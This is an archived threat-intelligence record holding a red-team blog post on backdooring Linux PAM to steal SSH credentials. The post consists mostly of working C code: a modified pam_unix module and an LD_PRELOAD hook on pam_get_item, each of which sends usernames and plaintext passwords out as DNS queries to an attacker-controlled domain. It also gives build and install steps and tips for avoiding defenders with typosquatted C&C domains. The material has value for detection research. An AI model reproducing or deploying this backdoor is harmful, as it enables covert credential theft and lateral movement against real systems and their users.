{
	"id": "7c19837f-7e2f-4073-adee-6c0012094d36",
	"created_at": "2026-04-06T01:29:16.631967Z",
	"updated_at": "2026-04-10T03:21:37.023512Z",
	"deleted_at": null,
	"sha1_hash": "f80cfdee6aa5a8b082af1b1fa3b2ba2a0c8e22db",
	"title": "Exfiltrating credentials via PAM backdoors \u0026 DNS requests :: DoomsDay Vault",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 121532,
	"plain_text": "Exfiltrating credentials via PAM backdoors \u0026 DNS requests ::\r\nDoomsDay Vault\r\nBy DoomsDay Vault\r\nArchived: 2026-04-06 00:28:48 UTC\r\nThe Wayback Machine - https://web.archive.org/web/20240303094335/https://x-c3ll.github.io/posts/PAM-backdoor-DNS/\r\n2018-06-27 13:37:00 +0000\r\nProbably one of the most well-known post-exploitation techniques used in pentests, and in Red Team\r\noperations, is to drop a backdoor in the PAM ecosystem in order to collect valid credentials. The credentials\r\ncaught by our backdoor will help us to perform lateral movement between machines easily. We can achieve\r\nthis through different options.\r\nAn interesting twist is to mix up this technique with the classic DNS exfiltration, so we can send the\r\ncredentials to our C\u0026C without worrying about firewalls and traffic rules. We only need to send a DNS request to the\r\nDNS server used by the machine, then it will be forwarded to other DNS servers, and at some point the request\r\nwill hit our Authoritative DNS Server. So we can silently retrieve credentials using this well-known covert\r\nchannel.\r\nOur roadmap is pretty simple: add a custom PAM module that logs the credential in plaintext and sends it to\r\nour C\u0026C through a DNS resolution.\r\nAs a side note: even if this is an old and well-known tactic, it keeps being a really cool way to show the need\r\nfor file integrity controls. Root a server, wait until an administrator or operator logs in via SSH and enjoy! :)\r\n0x01 Modifying pam_unix_auth.c\r\n(We are not going to explain what PAM is or how it works. To get deeper information about PAM, use\r\nman ).\r\nIn order to retrieve the user and password in clear text we are going to replace the legitimate pam_unix.so\r\nmodule with one modified by us. 
If we check the source code of the original module (download the source code of\r\nthe PAM version installed in your target server from here), we can see in the pam_unix_auth.c file a function\r\ncalled pam_sm_authenticate, and inside this function a call to _unix_verify_password whose arguments are the\r\nusername and password used in the authentication:\r\n// (...)\r\n/* verify the password of this user */\r\nretval = _unix_verify_password(pamh, name, p, ctrl);\r\nname = p = NULL;\r\nAUTH_RETURN;\r\n}\r\n// (...)\r\nSo it looks fine to inject our exfiltration logic at this point. As a PoC, we can use this snippet of code (Silver\r\nMoon - 29/4/2009), so the main exfiltration logic is already implemented (this code has some bugs, for example it\r\ndoes not take the server IP from resolv.conf, so if you are going to use it in a real pentest, reimplement the code\r\n;D). Let's vim the pam_unix_auth.c file to add the functions and headers needed!:\r\n/* Fun starts here :)\r\n * pam_sm_authenticate() performs UNIX/shadow authentication\r\n *\r\n * First, if shadow support is available, attempt to perform\r\n * authentication using shadow passwords. If shadow is not\r\n * available, or user does not have a shadow password, fallback\r\n * onto a normal UNIX authentication\r\n */\r\n/* Backdoor - DNS code extracted from https://gist.github.com/fffaraz/9d9170b57791c28ccda9255b48315168 */\r\n// The code sucks a lot. It is Sunday and I have a hangover, so I am not in the mood to fix it.\r\n// Tons of bugs and useless code that you should remove. 
Forgive me, please :)\r\n#include \u003csys/socket.h\u003e\r\n#include \u003carpa/inet.h\u003e\r\n#include \u003cnetinet/in.h\u003e\r\n//List of DNS Servers registered on the system\r\nchar dns_servers[10][100];\r\nint dns_server_count = 0;\r\n//Types of DNS resource records :)\r\n \r\n#define T_A 1 //Ipv4 address\r\n#define T_NS 2 //Nameserver\r\n#define T_CNAME 5 // canonical name\r\n#define T_SOA 6 /* start of authority zone */\r\n#define T_PTR 12 /* domain name pointer */\r\n#define T_MX 15 //Mail server\r\n \r\n//Function Prototypes\r\nvoid ngethostbyname (unsigned char* , int);\r\nvoid ChangetoDnsNameFormat (unsigned char*,unsigned char*);\r\nunsigned char* ReadName (unsigned char*,unsigned char*,int*);\r\nvoid get_dns_servers();\r\n//DNS header structure\r\nstruct DNS_HEADER\r\n{\r\n unsigned short id; // identification number\r\n \r\n unsigned char rd :1; // recursion desired\r\n unsigned char tc :1; // truncated message\r\n unsigned char aa :1; // authoritive answer\r\n unsigned char opcode :4; // purpose of message\r\n unsigned char qr :1; // query/response flag\r\n \r\n unsigned char rcode :4; // response code\r\n unsigned char cd :1; // checking disabled\r\n unsigned char ad :1; // authenticated data\r\n unsigned char z :1; // its z! 
reserved\r\n unsigned char ra :1; // recursion available\r\n \r\n unsigned short q_count; // number of question entries\r\n unsigned short ans_count; // number of answer entries\r\n unsigned short auth_count; // number of authority entries\r\n unsigned short add_count; // number of resource entries\r\n};\r\n \r\n//Constant sized fields of query structure\r\nstruct QUESTION\r\n{\r\n unsigned short qtype;\r\n unsigned short qclass;\r\n};\r\n \r\n//Constant sized fields of the resource record structure\r\n#pragma pack(push, 1)\r\nstruct R_DATA\r\n{\r\n unsigned short type;\r\n unsigned short _class;\r\n unsigned int ttl;\r\n unsigned short data_len;\r\n};\r\n#pragma pack(pop)\r\n \r\n//Pointers to resource record contents\r\nstruct RES_RECORD\r\n{\r\n unsigned char *name;\r\n struct R_DATA *resource;\r\n unsigned char *rdata;\r\n};\r\n \r\n//Structure of a Query\r\ntypedef struct\r\n{\r\n unsigned char *name;\r\n struct QUESTION *ques;\r\n} QUERY;\r\n/*\r\n * Perform a DNS query by sending a packet\r\n * */\r\nvoid ngethostbyname(unsigned char *host , int query_type)\r\n{\r\n unsigned char buf[65536],*qname,*reader;\r\n int i , j , stop , s;\r\n \r\n struct sockaddr_in a;\r\n \r\n struct RES_RECORD answers[20],auth[20],addit[20]; //the replies from the DNS server\r\n struct sockaddr_in dest;\r\n \r\n struct DNS_HEADER *dns = NULL;\r\n struct QUESTION *qinfo = NULL;\r\n \r\n printf(\"Resolving %s\" , host);\r\n \r\n s = socket(AF_INET , SOCK_DGRAM , IPPROTO_UDP); //UDP packet for DNS queries\r\n \r\n dest.sin_family = AF_INET;\r\n dest.sin_port = htons(53);\r\n dest.sin_addr.s_addr = inet_addr(dns_servers[0]); //dns servers\r\n \r\n //Set the DNS structure to standard queries\r\n dns = (struct DNS_HEADER *)\u0026buf;\r\n \r\n dns-\u003eid = (unsigned short) htons(getpid());\r\n dns-\u003eqr = 0; //This is a query\r\n dns-\u003eopcode = 0; //This is a standard 
query\r\n dns-\u003eaa = 0; //Not Authoritative\r\n dns-\u003etc = 0; //This message is not truncated\r\n dns-\u003erd = 1; //Recursion Desired\r\n dns-\u003era = 0; //Recursion not available! hey we dont have it (lol)\r\n dns-\u003ez = 0;\r\n dns-\u003ead = 0;\r\n dns-\u003ecd = 0;\r\n dns-\u003ercode = 0;\r\n dns-\u003eq_count = htons(1); //we have only 1 question\r\n dns-\u003eans_count = 0;\r\n dns-\u003eauth_count = 0;\r\n dns-\u003eadd_count = 0;\r\n \r\n //point to the query portion\r\n qname =(unsigned char*)\u0026buf[sizeof(struct DNS_HEADER)];\r\n \r\n ChangetoDnsNameFormat(qname , host);\r\n qinfo =(struct QUESTION*)\u0026buf[sizeof(struct DNS_HEADER) + (strlen((const char*)qname) + 1)]; //fill it\r\n \r\n qinfo-\u003eqtype = htons( query_type ); //type of the query , A , MX , CNAME , NS etc\r\n qinfo-\u003eqclass = htons(1); //its internet (lol)\r\n \r\n printf(\"\\nSending Packet...\");\r\n if( sendto(s,(char*)buf,sizeof(struct DNS_HEADER) + (strlen((const char*)qname)+1) + sizeof(struct QUESTION)\r\n {\r\n perror(\"sendto failed\");\r\n }\r\n printf(\"Done\");\r\n \r\n //Receive the answer\r\n i = sizeof dest;\r\n printf(\"\\nReceiving answer...\");\r\n if(recvfrom (s,(char*)buf , 65536 , 0 , (struct sockaddr*)\u0026dest , (socklen_t*)\u0026i ) \u003c 0)\r\n {\r\n perror(\"recvfrom failed\");\r\n }\r\n printf(\"Done\");\r\n \r\n dns = (struct DNS_HEADER*) buf;\r\n \r\n //move ahead of the dns header and the query field\r\n reader = \u0026buf[sizeof(struct DNS_HEADER) + (strlen((const char*)qname)+1) + sizeof(struct QUESTION)];\r\n \r\n printf(\"\\nThe response contains : \");\r\n printf(\"\\n %d Questions.\",ntohs(dns-\u003eq_count));\r\n printf(\"\\n %d Answers.\",ntohs(dns-\u003eans_count));\r\n printf(\"\\n %d Authoritative Servers.\",ntohs(dns-\u003eauth_count));\r\n printf(\"\\n %d Additional 
records.\\n\\n\",ntohs(dns-\u003eadd_count));\r\n \r\n //Start reading answers\r\n stop=0;\r\n \r\n for(i=0;i\u003cntohs(dns-\u003eans_count);i++)\r\n {\r\n answers[i].name=ReadName(reader,buf,\u0026stop);\r\n reader = reader + stop;\r\n \r\n answers[i].resource = (struct R_DATA*)(reader);\r\n reader = reader + sizeof(struct R_DATA);\r\n \r\n if(ntohs(answers[i].resource-\u003etype) == 1) //if its an ipv4 address\r\n {\r\n answers[i].rdata = (unsigned char*)malloc(ntohs(answers[i].resource-\u003edata_len));\r\n \r\n for(j=0 ; j\u003cntohs(answers[i].resource-\u003edata_len) ; j++)\r\n {\r\n answers[i].rdata[j]=reader[j];\r\n }\r\n \r\n answers[i].rdata[ntohs(answers[i].resource-\u003edata_len)] = '\\0';\r\n \r\n reader = reader + ntohs(answers[i].resource-\u003edata_len);\r\n }\r\n else\r\n {\r\n answers[i].rdata = ReadName(reader,buf,\u0026stop);\r\n reader = reader + stop;\r\n }\r\n }\r\n \r\n //read authorities\r\n for(i=0;i\u003cntohs(dns-\u003eauth_count);i++)\r\n {\r\n auth[i].name=ReadName(reader,buf,\u0026stop);\r\n reader+=stop;\r\n \r\n auth[i].resource=(struct R_DATA*)(reader);\r\n reader+=sizeof(struct R_DATA);\r\n \r\n auth[i].rdata=ReadName(reader,buf,\u0026stop);\r\n reader+=stop;\r\n }\r\n \r\n //read additional\r\n for(i=0;i\u003cntohs(dns-\u003eadd_count);i++)\r\n {\r\n addit[i].name=ReadName(reader,buf,\u0026stop);\r\n reader+=stop;\r\n \r\n addit[i].resource=(struct R_DATA*)(reader);\r\n reader+=sizeof(struct R_DATA);\r\n if(ntohs(addit[i].resource-\u003etype)==1)\r\n {\r\n addit[i].rdata = (unsigned char*)malloc(ntohs(addit[i].resource-\u003edata_len));\r\n for(j=0;j\u003cntohs(addit[i].resource-\u003edata_len);j++)\r\n addit[i].rdata[j]=reader[j];\r\n \r\n addit[i].rdata[ntohs(addit[i].resource-\u003edata_len)]='\\0';\r\n 
reader+=ntohs(addit[i].resource-\u003edata_len);\r\n }\r\n else\r\n {\r\n addit[i].rdata=ReadName(reader,buf,\u0026stop);\r\n reader+=stop;\r\n }\r\n }\r\n \r\n //print answers\r\n printf(\"\\nAnswer Records : %d \\n\" , ntohs(dns-\u003eans_count) );\r\n for(i=0 ; i \u003c ntohs(dns-\u003eans_count) ; i++)\r\n {\r\n printf(\"Name : %s \",answers[i].name);\r\n \r\n if( ntohs(answers[i].resource-\u003etype) == T_A) //IPv4 address\r\n {\r\n long *p;\r\n p=(long*)answers[i].rdata;\r\n a.sin_addr.s_addr=(*p); //working without ntohl\r\n printf(\"has IPv4 address : %s\",inet_ntoa(a.sin_addr));\r\n }\r\n \r\n if(ntohs(answers[i].resource-\u003etype)==5)\r\n {\r\n //Canonical name for an alias\r\n printf(\"has alias name : %s\",answers[i].rdata);\r\n }\r\n \r\n printf(\"\\n\");\r\n }\r\n \r\n //print authorities\r\n printf(\"\\nAuthoritive Records : %d \\n\" , ntohs(dns-\u003eauth_count) );\r\n for( i=0 ; i \u003c ntohs(dns-\u003eauth_count) ; i++)\r\n {\r\n \r\n printf(\"Name : %s \",auth[i].name);\r\n if(ntohs(auth[i].resource-\u003etype)==2)\r\n {\r\n printf(\"has nameserver : %s\",auth[i].rdata);\r\n }\r\n printf(\"\\n\");\r\n }\r\n \r\n //print additional resource records\r\n printf(\"\\nAdditional Records : %d \\n\" , ntohs(dns-\u003eadd_count) );\r\n for(i=0; i \u003c ntohs(dns-\u003eadd_count) ; i++)\r\n {\r\n printf(\"Name : %s \",addit[i].name);\r\n if(ntohs(addit[i].resource-\u003etype)==1)\r\n {\r\n long *p;\r\n p=(long*)addit[i].rdata;\r\n a.sin_addr.s_addr=(*p);\r\n printf(\"has IPv4 address : %s\",inet_ntoa(a.sin_addr));\r\n }\r\n printf(\"\\n\");\r\n }\r\n return;\r\n}\r\n \r\n/*\r\n *\r\n * */\r\nu_char* ReadName(unsigned char* reader,unsigned char* buffer,int* count)\r\n{\r\n unsigned char *name;\r\n unsigned int p=0,jumped=0,offset;\r\n int i , j;\r\n \r\n *count = 1;\r\n name = (unsigned char*)malloc(256);\r\n \r\n name[0]='\\0';\r\n \r\n //read 
the names in 3www6google3com format\r\n while(*reader!=0)\r\n {\r\n if(*reader\u003e=192)\r\n {\r\n offset = (*reader)*256 + *(reader+1) - 49152; //49152 = 11000000 00000000 ;)\r\n reader = buffer + offset - 1;\r\n jumped = 1; //we have jumped to another location so counting wont go up!\r\n }\r\n else\r\n {\r\n name[p++]=*reader;\r\n }\r\n \r\n reader = reader+1;\r\n \r\n if(jumped==0)\r\n {\r\n *count = *count + 1; //if we havent jumped to another location then we can count up\r\n }\r\n }\r\n \r\n name[p]='\\0'; //string complete\r\n if(jumped==1)\r\n {\r\n *count = *count + 1; //number of steps we actually moved forward in the packet\r\n }\r\n \r\n //now convert 3www6google3com0 to www.google.com\r\n for(i=0;i\u003c(int)strlen((const char*)name);i++)\r\n {\r\n p=name[i];\r\n for(j=0;j\u003c(int)p;j++)\r\n {\r\n name[i]=name[i+1];\r\n i=i+1;\r\n }\r\n name[i]='.';\r\n }\r\n name[i-1]='\\0'; //remove the last dot\r\n return name;\r\n}\r\n \r\n/*\r\n * Get the DNS servers from /etc/resolv.conf file on Linux\r\n * */\r\nvoid get_dns_servers()\r\n{\r\n FILE *fp;\r\n char line[200] , *p;\r\n if((fp = fopen(\"/etc/resolv.conf\" , \"r\")) == NULL)\r\n {\r\n printf(\"Failed opening /etc/resolv.conf file \\n\");\r\n }\r\n \r\n while(fgets(line , 200 , fp))\r\n {\r\n if(line[0] == '#')\r\n {\r\n continue;\r\n }\r\n if(strncmp(line , \"nameserver\" , 10) == 0)\r\n {\r\n p = strtok(line , \" \");\r\n p = strtok(NULL , \" \");\r\n \r\n //p now is the dns ip :)\r\n //????\r\n }\r\n }\r\n // EDIT THIS. 
It is a PoC\r\n strcpy(dns_servers[0] , \"127.0.0.1\");\r\n \r\n}\r\n \r\n/*\r\n * This will convert www.google.com to 3www6google3com\r\n * got it :)\r\n * */\r\nvoid ChangetoDnsNameFormat(unsigned char* dns,unsigned char* host)\r\n{\r\n int lock = 0 , i;\r\n strcat((char*)host,\".\");\r\n \r\n for(i = 0 ; i \u003c strlen((char*)host) ; i++)\r\n {\r\n if(host[i]=='.')\r\n {\r\n *dns++ = i-lock;\r\n for(;lock\u003ci;lock++)\r\n {\r\n *dns++=host[lock];\r\n }\r\n lock++; //or lock=i+1;\r\n }\r\n }\r\n *dns++='\\0';\r\n}\r\n#define _UNIX_AUTHTOK \"-UN*X-PASS\"\r\n// (...)\r\nAnd, lastly, this little edit:\r\n// (...)\r\n/* verify the password of this user */\r\n retval = _unix_verify_password(pamh, name, p, ctrl);\r\n unsigned char hostname[100];\r\n get_dns_servers();\r\n snprintf(hostname, sizeof(hostname), \"%s.%s.nowhere.local\", name, p); // Change it with your domain\r\n if (fork() == 0) {\r\n ngethostbyname(hostname, T_A);\r\n }\r\n name = p = NULL;\r\n// (...)\r\nCompile the module (./configure \u0026\u0026 make) and replace the original pam_unix.so with our version, then\r\nopen a tcpdump / wireshark and log in to the machine via SSH:\r\nDNS 96 Standard query 0x6d43 A mothra.RabbitHunt3r.nowhere.local\r\nNice! A DNS request was made, so we can exfiltrate usernames and passwords to an external server\r\ncontrolled by us. But now we have a problem: what happens with uppercase / lowercase / symbols used in\r\npasswords? Later in section “0x03 Communication with C\u0026C” we will discuss this point.\r\n0x02 LD_PRELOAD all the things!\r\nIn some cases another approach will be needed. If the server performs any type of file integrity check on\r\ncritical binaries (as pam_unix.so and other modules are) or configuration files, we need to move to the classic\r\nLD_PRELOAD tactic. 
We are going to pre-load a shared object that hooks some functions used by PAM, so we\r\ncan easily inject our exfiltration logic inside.\r\nOur target function will be pam_get_item. When this function is called with the item type\r\nPAM_AUTHTOK as argument, it retrieves the authentication token used. We are going to hook this function, so\r\nwhen it is called we are going to call pam_get_user() to retrieve the username, then call the original pam_get_item\r\n(to obtain the correct return value and the authentication token), exfiltrate it via DNS and lastly return the value\r\nobtained before. Easy peasy!\r\n/* Classic LD_PRELOAD PAM backdoor with DNS exfiltration */\r\n// Author: Juan Manuel Fernandez (@TheXC3LL)\r\n#define _GNU_SOURCE\r\n#include \u003csecurity/pam_modules.h\u003e\r\n#include \u003csecurity/pam_ext.h\u003e\r\n#include \u003csecurity/pam_modutil.h\u003e\r\n#include \u003cstdlib.h\u003e\r\n#include \u003cstring.h\u003e\r\n#include \u003csys/types.h\u003e\r\n#include \u003cunistd.h\u003e\r\n#include \u003cstdio.h\u003e\r\n#include \u003cdlfcn.h\u003e\r\n#include \u003csys/stat.h\u003e\r\n#include \u003csignal.h\u003e\r\n// Insert here all the headers and functions needed for the DNS request\r\n//(...)\r\ntypedef int (*orig_ftype) (const pam_handle_t *pamh, int item_type, const void **item);\r\n \r\nint pam_get_item(const pam_handle_t *pamh, int item_type, const void **item) {\r\n int retval;\r\n int pid;\r\n const char *name;\r\n orig_ftype orig_pam;\r\n orig_pam = (orig_ftype)dlsym(RTLD_NEXT, \"pam_get_item\");\r\n \r\n // Call original function so we log password\r\n retval = orig_pam(pamh, item_type, item);\r\n \r\n // Log credential\r\n if (item_type == PAM_AUTHTOK \u0026\u0026 retval == PAM_SUCCESS \u0026\u0026 *item != NULL) {\r\nunsigned char hostname[256];\r\n get_dns_servers();\r\n pam_get_user((pam_handle_t *)pamh, 
\u0026name, NULL);\r\n snprintf(hostname, sizeof(hostname), \"%s.%s.nowhere.local\", name, *item); // Change it with your domain\r\n if (fork() == 0) {\r\n ngethostbyname(hostname, T_A);\r\n }\r\n }\r\n \r\n return retval;\r\n}\r\nCompile ( gcc pam_fucked.c -shared -fPIC -o pam_fucked.so ), stop the SSH daemon and relaunch it with\r\nLD_PRELOAD=/../module/location…/.\r\nThe use of LD_PRELOAD has a few negative side effects, like the need to restart the daemon, which can\r\ngenerate other kinds of events that can alert the Blue Team. On the other hand, if you are going to restart a critical\r\nservice such as SSH you must operate from a point outside of SSH (maybe a reverse shell) and keep an eye out to avoid\r\nterminating the current sessions :).\r\n0x03 Communication with C\u0026C\r\nAs we stated before, we need to encode the data that will be exfiltrated (and in a real pentest encrypt this\r\ninformation). The best options are to encode it as hexadecimal (but the size is doubled so it is not the best idea) or\r\nas base32 (careful with the padding symbol). The C\u0026C must be configured as an authoritative DNS server and the best idea is to\r\nuse a typosquatted domain with a faked whois that simulates a real domain used by the company.\r\nYou can install a real DNS server, or just create the needed logic using python and dnslib :).\r\n0x04 Final words\r\nI hope you find the idea of exfiltrating credentials via a classic covert channel like DNS cool. 
It is a really easy\r\nway to obtain new credentials in a recently compromised server and conquer other points of the network.\r\nAs I always say, if you find a typo or want to comment something, feel free to ping me on twitter\r\n(@TheXC3LL).\r\nSource: https://web.archive.org/web/20240303094335/https://x-c3ll.github.io/posts/PAM-backdoor-DNS/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://web.archive.org/web/20240303094335/https://x-c3ll.github.io/posts/PAM-backdoor-DNS/"
	],
	"report_names": [
		"PAM-backdoor-DNS"
	],
	"threat_actors": [],
	"ts_created_at": 1775438956,
	"ts_updated_at": 1775791297,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f80cfdee6aa5a8b082af1b1fa3b2ba2a0c8e22db.pdf",
		"text": "https://archive.orkl.eu/f80cfdee6aa5a8b082af1b1fa3b2ba2a0c8e22db.txt",
		"img": "https://archive.orkl.eu/f80cfdee6aa5a8b082af1b1fa3b2ba2a0c8e22db.jpg"
	}
}